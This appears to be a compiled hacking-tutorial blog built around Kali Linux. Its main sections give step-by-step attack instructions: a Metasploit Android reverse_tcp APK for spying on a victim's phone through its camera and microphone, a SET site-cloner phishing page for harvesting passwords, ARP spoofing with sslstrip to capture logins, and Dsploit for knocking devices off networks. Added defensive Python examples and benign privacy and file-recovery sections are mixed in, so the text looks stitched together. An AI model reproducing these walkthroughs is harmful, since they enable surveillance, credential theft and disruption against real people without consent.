Hacking an android phone with Metasploit

Android devices have been a potential target from the day they were introduced to the market. They have proved to be good targets because they give out a lot of information about their owner. There are various ways to hack an Android phone, such as through an app, a browser, etc.

What you need?
All you need is Kali Linux installed on VMware.

How to?
  1. Open the terminal, type the command ifconfig and note down the eth0 IP.
  2. Now type the command cd Desktop so that the APK file is generated on the desktop of the virtual machine.
  3. Now type the command msfpayload android/meterpreter/reverse_tcp LHOST=ip LPORT=port R > hcak.apk. Here you have to paste the IP after LHOST=, and you can change hcak to any name you would prefer for the app.
  4. Now type msfconsole and hit enter, and then type use exploit/multi/handler and hit enter.
  5. Now type set payload android/meterpreter/reverse_tcp and hit enter to set the payload for the handler.
  6. Now, to set the listener IP and port, type set lhost ip and set lport port (make sure that the IP and port are the same as those used in the msfpayload command). To check that the IP and port are properly set, type show options and hit enter.
  7. Now type exploit, hit enter and wait for the victim to install the APK and open it.
  8. Now type ifconfig or sysinfo to find out details about your target. You can try different commands to take snapshots, webcam snaps, voice recordings, etc.
Note:-
You will only have access to the phone until the session ends; if the session ends, you have to wait until the victim runs the app again.

SET: Phishing like a Pro

Phishing is a technique used by hackers to obtain usernames and passwords by asking the victim to enter their credentials into a webpage which looks similar to the original site. This technique needs your social engineering skills along with a fair set of programming skills. And you also need to know a lit. Kali Linux provides a toolkit known as SET (Social Engineering Toolkit) which makes this complex process a lot easier and a lot more systematic.


But this trick is only successful against a careless user.

What you need?

All you need is Kali Linux installed on VMware.

How to
  1. Start the terminal, type ifconfig and note the eth0 IP, which is your Ethernet IP.
  2. Now type the command service metasploit start to start the Metasploit service.
  3. Now type the command setoolkit and hit enter to start the SET toolkit. Then type 1 to select the first option and hit enter.
  4. Now select option 2 from the list and hit enter.
  5. Now select option 3 from the list and hit enter.
  6. Now select option 2, which is the site cloner, from the list and hit enter.
  7. Now enter the eth0 IP which you noted in the beginning using ifconfig, hit enter, then enter the site URL (http://www.anysite.com) and hit enter.
  8. Now type the IP into any web browser to see the phishing site. Paste the IP into Google URL shortener to convert the IP into a good-looking URL. Send this to the victim via various methods and wait. After the careless user enters the username and password, check the file with a name like harvester_date.txt in the folder /var/www/.

Note:-
This trick will only work if the user is careless enough to enter his/her credentials on the fake page. Another problem is that if you look at the URL you can tell the difference between the original and the fake one. In other words, it depends on how careless the user is.

SSL Strip

What is SSL Strip? 
SSL strip is a type of man-in-the-middle attack in which an HTTPS request is converted to an HTTP request and then sent to the website through the router, so the browser ends up connected to the website over an HTTP connection.
HTTPS is more secure than HTTP (according to security professionals), but according to hackers "EVERYTHING is Shit".


What you need?
  1. Kali Linux installed on VMware
  2. An Android phone with Fing - Network Tools (optional)
How to?
  1. Start your virtual machine.
  2. Open the terminal and type ifconfig. It will give you the list of interfaces. Note the wireless LAN interface (wlan*).
  3. Now type the command echo 1 > /proc/sys/net/ipv4/ip_forward, and then type iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 to forward the traffic.
  4. Then you can type the commands route -n (for the gateway IP) and nmap -sS -O gateway_ip (for the target IP), or you can simply open Fing - Network Tools to find out the router and target IPs.
  5. Now start the ARP spoofing by typing the command arpspoof -i wlan0 -t 192.168.1.123 -r 192.168.1.1. Here wlan0 can be replaced by your wireless LAN interface (wlan0, wlan1, wlan2, etc.), the IP after -t is your target IP and the IP after -r is the router IP.
  6. Keep the arpspoof terminal running, then open a new terminal window and type sslstrip -l 8080.
  7. Now wait; after the target logs into any site you will see some details in the sslstrip window. Open a new terminal window and type cat sslstrip.log. This command opens the log file; try to locate an email ID and password in it.
Note:-
This will not work on Facebook, as the traffic is encrypted, so you won't get the username and password.
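A defender-side check for the ARP spoofing step described above, as an added example that is not part of the original post: it parses two constructed snapshots of a victim's ARP table (arp -n format) and flags the two signs that the arpspoof step leaves behind, the gateway's MAC changing and one MAC answering for several IPs. The gateway address 192.168.1.1 is taken from the walkthrough; the MAC addresses are made up.

```python
"""Detect ARP-spoofing signs in snapshots of a host's ARP table.

Added example for the SSL strip section; not part of the original post.
The ARP snapshots below are constructed, and the gateway 192.168.1.1 is
assumed to be the router used in the walkthrough.
"""
import re
from collections import defaultdict

# Parses the classic `arp -n` layout: Address HWtype HWaddress Flags Iface.
ARP_LINE = re.compile(
    r"^(?P<ip>\d+\.\d+\.\d+\.\d+)\s+\S+\s+(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})",
    re.IGNORECASE,
)

def parse_arp_table(text):
    """Return {ip: mac} from `arp -n` output (header lines are skipped)."""
    table = {}
    for line in text.splitlines():
        m = ARP_LINE.match(line.strip())
        if m:
            table[m.group("ip")] = m.group("mac").lower()
    return table

def find_spoof_indicators(before, after, gateway_ip):
    """Compare two ARP snapshots and return a list of alert strings.

    Two signs are checked: the gateway's MAC changing between snapshots
    (what arpspoof -r <router> causes on the victim), and one MAC claiming
    several IPs (the attacker's NIC answering for both router and target).
    """
    alerts = []
    old_gw, new_gw = before.get(gateway_ip), after.get(gateway_ip)
    if old_gw and new_gw and old_gw != new_gw:
        alerts.append(f"gateway {gateway_ip} MAC changed {old_gw} -> {new_gw}")
    by_mac = defaultdict(list)
    for ip, mac in after.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            alerts.append(f"MAC {mac} claims multiple IPs: {', '.join(sorted(ips))}")
    return alerts

# Constructed snapshots: in the second one the router's entry now carries
# the same MAC as another host on the LAN.
SNAPSHOT_BEFORE = """\
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.1.1              ether   aa:bb:cc:00:00:01   C                     wlan0
192.168.1.50             ether   aa:bb:cc:00:00:50   C                     wlan0
"""
SNAPSHOT_AFTER = """\
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.1.1              ether   aa:bb:cc:00:00:50   C                     wlan0
192.168.1.50             ether   aa:bb:cc:00:00:50   C                     wlan0
"""

def demo():
    """Run the comparison on the constructed snapshots."""
    return find_spoof_indicators(parse_arp_table(SNAPSHOT_BEFORE),
                                 parse_arp_table(SNAPSHOT_AFTER), "192.168.1.1")

if __name__ == "__main__":
    for alert in demo():
        print("ALERT:", alert)
```

On a real host the same comparison can be run periodically against the live ARP table; a static ARP entry for the gateway removes the first sign entirely.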
  

Recover & Retrieve: Find out your friend's secrets

Whenever we get a pendrive, even if the drive is empty it still holds a lot of information about what was stored on it. This can help you find out what he/she had saved on that drive, or recover sensitive information about your company which an employee had leaked. Recovery can be done for various reasons, but the tricks remain the same.


What you need?
All you need is Kali Linux on VMware.

How to? 

Level-1:- Recuva
Recuva is a basic file recovery program which can be used to recover files deleted on a regular Windows computer. This software is also portable; to make a portable version you only need to copy the files from the Program Files directory to your pendrive. It can recover files of a specific format like images, videos, music, etc. It is useful for quickly recovering a file which you might have accidentally deleted.
  

We need to run a basic command, fdisk -l, which gives you the device names of all attached drives; the recovery tools need this name to work on a USB stick mounted to your Linux system.

You can consider this as the first step towards file recovery in Kali Linux.

Level-2:- foremost
foremost is a quick recovery tool available in Kali Linux. This tool can be used in audits where you need to recover deleted files quickly. You can use various parameters according to the requirements of the audit. To find out about all the parameters you can run the command foremost -h. If you want to recover all files and save them to an output directory, you can use the command foremost -t all -v -i device_name -o directory. Here -t is the parameter which decides the type of file, -i is the parameter which gives the device name or image name, and -o is the parameter which sets the output directory.

Level-3:- scalpel
scalpel is like a bazooka in the field of recovery. This is the ultimate recovery tool, which can recover all the files deleted from a drive or an image of that drive. To use this tool you will first need to make some changes in the .conf file (scalpel.conf) present in /etc/scalpel. You have to delete the # in front of the file type you want to recover. The simplest thing you can do is delete all the # in front of all the file formats. After this, save it, open a terminal and type scalpel -h to find out about the different parameters you can use. To recover the files to a specific directory, type the command scalpel device_name_or_image_file_path -o output_directory.


Note:- When you use tools like scalpel and foremost you get an audit.txt file along with the actual files. This audit.txt file contains the log of all files which were recovered by the tools.

Another great feature of these tools is that they save the different file extensions under different folders, which is systematic and helpful for sorting the files and locating the one which is needed.
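To show what foremost and scalpel actually do when they carve a file type, here is a minimal header/footer carver as an added example (it is not the tools' own code): it finds JPEGs in a raw image by their start marker (FF D8 FF) and end marker (FF D9), exactly the kind of entry the scalpel.conf lines describe, and writes them into a jpg/ folder with an audit.txt log like the tools produce. The disk image is constructed in memory, so no USB stick is needed.

```python
"""Header/footer file carver in the style of foremost -t jpg (added example,
not the tools' own code).  It finds JPEGs in a raw image by their SOI marker
(FF D8 FF) and EOI marker (FF D9), the same approach the scalpel.conf entries
describe; the "disk image" below is constructed so it runs without a USB stick.
"""
import os
import tempfile

JPEG_HEADER = b"\xff\xd8\xff"
JPEG_FOOTER = b"\xff\xd9"
MAX_JPEG = 20 * 1024 * 1024  # per-file size cap, as foremost/scalpel use

def carve_jpegs(data):
    """Return [(offset, bytes)] for each JPEG found by its markers.

    A carver ignores the filesystem: deleted files keep their bytes until
    overwritten, so only the file-format markers are trusted.
    """
    found = []
    pos = data.find(JPEG_HEADER)
    while pos != -1:
        end = data.find(JPEG_FOOTER, pos + len(JPEG_HEADER), pos + MAX_JPEG)
        if end == -1:                      # header with no footer: skip it
            pos = data.find(JPEG_HEADER, pos + 1)
            continue
        end += len(JPEG_FOOTER)
        found.append((pos, data[pos:end]))
        pos = data.find(JPEG_HEADER, end)
    return found

def carve_to_directory(data, out_dir):
    """Write carved files to out_dir/jpg/ and an audit.txt log of offsets
    and sizes, mirroring the per-extension folders and audit file that
    foremost and scalpel produce.  Returns the written file names."""
    jpg_dir = os.path.join(out_dir, "jpg")
    os.makedirs(jpg_dir, exist_ok=True)
    names = []
    with open(os.path.join(out_dir, "audit.txt"), "w") as audit:
        for i, (offset, blob) in enumerate(carve_jpegs(data)):
            name = f"{i:08d}.jpg"
            with open(os.path.join(jpg_dir, name), "wb") as out:
                out.write(blob)
            audit.write(f"{name}\t{len(blob)}\t{offset}\n")
            names.append(name)
    return names

# Constructed image: free space, two tiny JPEG-like blobs, and an orphan
# header with no footer that a correct carver must not emit.
SAMPLE_IMAGE = (
    b"\x00" * 64
    + b"\xff\xd8\xff\xe0JFIF-one\xff\xd9"
    + b"\x00" * 32
    + b"\xff\xd8\xff\xe1Exif-two\xff\xd9"
    + b"\x00" * 16
    + b"\xff\xd8\xff" + b"\x00" * 16
)

def demo():
    """Carve SAMPLE_IMAGE into a temporary directory; returns the names."""
    with tempfile.TemporaryDirectory() as tmp:
        return carve_to_directory(SAMPLE_IMAGE, os.path.join(tmp, "output"))

if __name__ == "__main__":
    print(demo())
```

To run it on a real stick, read the device from fdisk -l (or a dd image of it) into data instead of SAMPLE_IMAGE; the markers and the audit log are the same.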

Ghost on the web: Science of private browsing

Whenever you go on the net there are various organizations that track your activity, which is then used for various purposes. This data is used for advertising and censorship. Some countries block certain content for their citizens. Now some of these organizations also try to trace you back to your house. If you are trying to view content blocked in your country and the government traces your IP, the next second you will find the government at your doorstep.
There are various methods to access the net anonymously.

Private windows:-
Nowadays all browsers have a feature for a private window (incognito in Chrome). This can be considered the first line of defense against cyber espionage, but it is not that effective, as the IP remains the same, so such methods can be easily bypassed. This kind of browsing can only protect you from individuals who have physical access to your computer. In other words, mom won't know about the sites you accessed.

Proxy sites:-
A proxy site is a special site which allows you to access blocked content. These sites act as a proxy server which relays all your traffic through the server to give you access to the blocked content. The problem with these sites is that they are very slow, and your IP is still exposed, hence the chance of getting traced is always there. In other words, you can watch YouTube videos on your college network. There are millions of such sites, like Kproxy, boomproxy, etc.


VPN:-
VPN is the acronym for virtual private network. A virtual private network is a virtual network to which a computer connects like a regular network, and in the process the public IP of the computer changes. To understand this we tried various Android apps like Psiphon, TunnelBear, etc. To check the public IP we used Landroid. The difference observed was that the public IP and ISP of my phone changed. In other words, you can teleport to any country.
 
It is understood that I didn't travel to Russia to connect to their network and take this screenshot. For security purposes I had to hide my IP.
This IP did change to US, Italian and many other countries' IPs.


We tried 2 services which were available for both Windows and Android: Psiphon and TunnelBear. TunnelBear was a free-to-try VPN and Psiphon was a completely free VPN. The main advantage of TunnelBear was that we could select the server manually, which offered a little control. But Psiphon was more practical as far as use was concerned. There are hundreds of other VPNs available on the net.

The main drawbacks are that if the government wants to trace you it is easy, as these servers have your IP. Also, all VPNs require a stable internet connection; if the connection keeps on dropping, these programs can slow down the device and sometimes drain your battery.

TOR:-
Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. It also enables software developers to create new communication tools with built-in privacy features. Tor provides the foundation for a range of applications that allow organizations and individuals to share information over public networks without compromising their privacy. It relays the traffic across various nodes. This channel is only kept open for 10 minutes and then the nodes are changed. This software was initially developed for the US armed forces so that they could connect to their home bases without any leaks, and it is simple to install and use. Tor is available for Android, Windows, Linux and various other operating systems.

You can host sites (onion sites) and access sites on the dark web (hidden web) through this. This software does take a little more time to connect but is highly secure. But it has a drawback: the initial and final connections aren't encrypted, and it requires a special browser to work, which is mostly a modified Firefox. There are ways to crack this as well, but the skill set required is high. In other words, you can be a ghost on the web.
 
Conclusion:-
Thus, by using various techniques depending on the level of security you need on the web, you can be a ghost on the web and browse the net privately.

OS fingerprinting

What is OS fingerprinting?
OS fingerprinting can be defined as the process of pinging a device and detecting which OS it is running. This can be done using various tools on various operating systems.

Why do you need to do this?
By detecting the OS running on a system you can filter and use the exploits which have a higher probability of giving you access to the system and maintaining it with ease. It also helps you save time, as you need not try the vulnerabilities against which the system is already patched.

How to?
  •  For Android:- The best tool which you can use for OS fingerprinting on an Android device is Dsploit. The time required for OS detection is mostly dependent on the device's RAM. To detect the OS, first you need to select the device on which you want to do the OS detection. After that you need to select the inspector and then hit start. After a few minutes you will see the results.
  • For Kali Linux:- Kali Linux has 2 tools to do this task:-
Nmap is a port scanning tool which can be used for OS fingerprinting. There are various parameters which can be used to detect different details about the system. The one which we used was "nmap -sV -n -T4 -O -F --version-light 192.168.1.*" (without quotes). The * helps you detect all the devices and their OSes on the network. You can experiment with different parameters; for help you can type "nmap -h" (without quotes) or refer to the official site.

Armitage is a GUI tool which is mostly used for network exploitation. This tool comes with a host scan option which can help you scan and detect the OS. There is a quick scan (OS detection) option under host scan which can be used for OS fingerprinting. After the scan ends, the result is displayed in a graphical format which can be changed as per your wish. You can observe that it runs the nmap command in the command line. The main advantage is that you need not type the command, and the graphical format is easy to understand.

Note:-
In our tests we found that these methods were unable to detect phone operating systems like Android, BlackBerry OS, etc.
If you are unable to detect the exact system then you can use the guess command in nmap to find out the probabilities of the system running different operating systems.
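As an added example (not nmap's own code), here is a small parser that turns the normal text output of the nmap -O scan above into a per-host OS inventory, the kind of thing a network owner keeps to know what is on the LAN: it records the exact "OS details" line, or when nmap could only guess, the best "Aggressive OS guesses" entry with its confidence, and lists the hosts that got neither, which are the ones to re-scan with nmap's --osscan-guess option. The report below is constructed in nmap's output format, not a real scan.

```python
"""Turn the normal output of nmap -O into a per-host OS inventory.

Added example for the OS fingerprinting section (not nmap's own code).
Records, per host, the exact "OS details" line or the best "Aggressive OS
guesses" entry; hosts with neither are candidates for --osscan-guess.
The report at the bottom is constructed, not a real scan.
"""
import re

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
GUESS_RE = re.compile(r"(.+?) \((\d+)%\)(?:, |$)")
DETAILS = "OS details: "
GUESSES = "Aggressive OS guesses: "

def parse_nmap_os(report):
    """Return {ip: {"os": str or None, "confidence": int or None, "exact": bool}}."""
    hosts, current = {}, None
    for line in report.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = m.group(1)
            hosts[current] = {"os": None, "confidence": None, "exact": False}
        elif current is None:
            continue                      # preamble before the first host
        elif line.startswith(DETAILS):
            # An exact fingerprint match: nmap prints no percentage here.
            hosts[current].update(os=line[len(DETAILS):], confidence=100, exact=True)
        elif line.startswith(GUESSES):
            # Comma-separated "Name (NN%)" items, best guess first.
            guesses = GUESS_RE.findall(line[len(GUESSES):])
            if guesses:
                name, pct = guesses[0]
                hosts[current].update(os=name, confidence=int(pct), exact=False)
    return hosts

def needs_guess(hosts):
    """IPs with no OS result at all, i.e. candidates for --osscan-guess."""
    return sorted(ip for ip, info in hosts.items() if info["os"] is None)

# Constructed report in nmap's normal-output format (not a real scan).
SAMPLE_REPORT = """\
Nmap scan report for 192.168.1.1
Host is up (0.0021s latency).
OS details: Linux 2.6.18 - 2.6.22
Network Distance: 1 hop

Nmap scan report for 192.168.1.50
Host is up (0.020s latency).
No exact OS matches for host (test conditions non-ideal).
Aggressive OS guesses: Android 4.4.2 (Linux 3.4) (96%), Linux 3.10 - 3.13 (91%)
Network Distance: 1 hop

Nmap scan report for 192.168.1.77
Host is up (0.030s latency).
Too many fingerprints match this host to give specific OS details
"""

if __name__ == "__main__":
    for ip, info in parse_nmap_os(SAMPLE_REPORT).items():
        print(ip, info)
    print("re-scan with --osscan-guess:", needs_guess(parse_nmap_os(SAMPLE_REPORT)))
```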

Kick Off with Dsploit

What you need?
For this attack you will only need a rooted Android phone and, of course, the app Dsploit.

How to??
  1. Open the app Dsploit on your phone.
  2. It will show you all the devices connected to the wireless network. If not, hit the refresh symbol on the left-hand side of the screen.
  3. Now select the specific target which you would like to kick off the network. If you want to attack the entire wireless network, select the router.
  4. Now select MITM (man-in-the-middle) from the list.
  5. Now it will open a new list. Select kill connections to kick the target, which can be a single device or all of them, off the network.
  6. After a few seconds you will see that the devices are unable to connect to the net through the browser.
  7. Select it once again to stop it...
Note:-
You can also select the other options like redirect, replace images, etc. We would advise you not to try this on corporate networks. If caught, you could be sent to jail. You can still use it to annoy your siblings or friends.
If you are using an Android phone with Android 4.0+ then you can use zANTI 2, which is an updated version of Dsploit.

How to select a phone to build a bad phone?

Why do you need to hack from a phone???
Phones are devices which were made to be portable. Since the 1990s hackers have been trying to use networks for malicious purposes. As time passed, phones became smarter and smarter as more features were added to them. And the best thing about these devices is that you can enter and exit without getting into trouble..


Which operating system do you need???
Phones come with various operating systems. But now most phones have Android or iOS; this mostly depends on the phone you buy. For example, if you buy a Sony, Samsung, Motorola, etc. then the OS is Android, and if you buy an Apple product you will have iOS. There are other operating systems which are good, but development for these operating systems is not sufficient, and coding your own exploits for these systems can be a headache. Let's compare iOS and Android, as these are the major operating systems in the smartphone market. iOS is a good operating system and has significant development. But it is a fairly locked-down OS, and hence it is a little hard to work in such a locked system. Thus, as far as hacking is concerned, the best operating system is Android. It is obvious that we need to get root access on the system to perform some hardcore hacking...

What hardware do you need in your phone??
  1. Processor:- Most Android phones have Snapdragon, Intel or ARM. The only difference between them is that Snapdragon is a high-graphics processor while ARM and Intel are good utility processors which support most apps. We would personally advise you to use ARM, as it is stable and most apps work on it; some apps like Dsploit require an ARM processor. You can check this with apps like the AnTuTu benchmark app and similar apps.
  2. NFC:- NFC (Near Field Communication) is a new feature which has been added to a few smartphones; this feature can be used for RFID hacking and some smart credit card skimming. This feature was added for easy and fast data sharing over short distances. You can check whether your phone has NFC or not on nfcworld.com.
  3. USB OTG compatibility:- This is also a new feature which allows you to connect USB devices to your phone through a connecting cable. This can be used to connect devices like SDRs, drives, antennas, wifi dongles, etc. which might be used for a wide range of attacks over different types of networks. You need to check your user manual to find out whether it is compatible or not. You can also Google search for this answer..

Conclusion:-
We would advise you to buy a phone within your budget which has as many features as possible, so that you can experiment with it. There are various apps you can download and have fun with.....

Network analysis with a non-rooted android phone

Introduction:-
Network analysis is the first step toward a network penetration test. Both Windows and Linux have many tools to analyze a network on the basis of different standards. But these operating systems usually run on devices which are a little too large for a usual pant or shirt pocket, and another problem with these tools is that most of them don't have a GUI, which means you might go crazy trying to explain things to a professional who doesn't have an IT background. Thus a set of tools was required which could be installed on a normal Android phone and deployed instantly. So I decided to find a few tools which could be used for network analysis on an out-of-the-box Android phone.


What you need?
An Android phone or tablet with 4.0 or above. You can also try it on phones with lower versions of Android, but we can't tell you whether it will work or not. The phone used for testing was a Samsung Galaxy Grand 2 with the Android 4.4.2 operating system.

Apps:-
Wifi Analyzer:- This is mostly a wireless network analysis tool. Its main advantage is that it scans the network and tells you which wifi channels have the most signal strength. It has 5 different views: channel graph, time graph, signal meter, AP list and channel rating. The 2 best views are the signal meter and the channel graph. Our personal favorite was the signal meter view, which is a meter-like GUI that notifies you about the wifi signal strength with a beeping sound similar to that of a metal detector.
Landroid:- Landroid is a little geeky app, as the interface requires a little knowledge about networks. It has features like ping, traceroute, public IP, netstat, whois, etc., which are mostly the features that network admins and network penetration testers require to check servers and network connectivity. We would advise you not to download this app if you are not used to a less graphical user interface. It is pure geek and pro stuff.


Network Signal Info:- This is mostly an info app which can be used to find out information regarding cellular and wireless networks. This app has a nice GUI in which it displays various information like MAC address, IP, SSID, BSSID, etc. The most interesting feature of this app is that it shows you the location of the nearest cell tower under a feature called "cell location". Some of the features of this app might be blocked, as they require you to buy the pro version to use them. All in all, a fairly good app to find out information regarding various aspects of your cellular as well as wireless network.
Fing - Network Tools:- This app is a wireless network scanning app which is similar to nmap. This app scans the network and shows you the IP addresses assigned to different devices in the network. This is mostly a scanning app and can be used with Dsploit for an inside attack on a computer on the network.